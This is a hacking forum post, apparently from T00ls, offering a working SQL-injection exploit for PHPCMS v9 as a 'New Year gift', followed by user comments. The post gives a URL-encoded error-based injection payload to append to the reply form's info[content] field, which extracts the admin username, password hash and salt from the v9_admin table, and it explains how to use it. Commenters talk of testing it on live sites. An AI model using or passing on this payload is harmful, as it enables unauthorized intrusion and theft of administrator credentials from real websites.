“T00ls新年礼物之三”phpcms__的EXP
脚本安全检测区发不了帖子,只能发在这里了
漏洞来源:https://www.t00ls.com/thread-21938-1-1.html
EXP构造:H4xssck3r
skysheep大大发了洞洞,没有EXP,下面也有人求,那小菜我就来构造个吧------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
下面说说怎么用吧……
回复的时候,删掉原有的
&info%5Bcontent%5D=123123
在最后加上上面的EXP
然后爆出
漏洞来源:https://www.t00ls.com/thread-21938-1-1.html
EXP构造:H4xssck3r
skysheep大大发了洞洞,没有EXP,下面也有人求,那小菜我就来构造个吧
&info%5B%60content%60%2C%60send%5Ffrom%5Fid%60%2C%60message%5Ftime%60%2C%60status%60%2C%60folder%60%29+VALUES+%28%27Re%3A+testtest%27%2C%273%27%2C%28select+1+FROM+%28select+count%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C%28substring%28%28select+%28select+concat%280x23%2Ccast%28concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cencrypt%29+as+char%29%2C0x23%29+from+v9%5Fadmin+LIMIT+0%2C1%29%29%2C1%2C62%29%29%29a+from+information%5Fschema%2Etables+group+by+a%29b%29%2C%273%27%2C%27testtest%27%2C%271360215364%27%2C%271%27%2C%27inbox%27%29+%2D%2D+%5D=3
下面说说怎么用吧……
回复的时候,删掉原有的
&info%5Bcontent%5D=123123
在最后加上上面的EXP
然后爆出
评论19次
没测试成功啊,我RP问题?
新年果然各种福利
各种洞洞出现啊。
都爆发了!哈哈
强悍。。。。
新年礼物二貌似是娃娃滴
shopex是娃娃的那个还是新的? https://t00ls.net/thread-21921-1-1.html
有……但是shopex那个貌似要开错误提示才能用,网上测了几个,只有本地和官方demo测试成功。。。。很是蛋疼
怎么没有二?
test一下,,感谢ing....
找个站点test去
测了能用就没改了……加到最后就行了……
这个exp没anti他的那个规则。。
我只是构造了个EXP...
不知道唉……今天刚进来,看到你们发福利……我就把之前构造的EXP放了……
各种洞
各种洞洞出现啊。
过年了 各种洞洞啊
这明显是大C挖的洞丫。。。。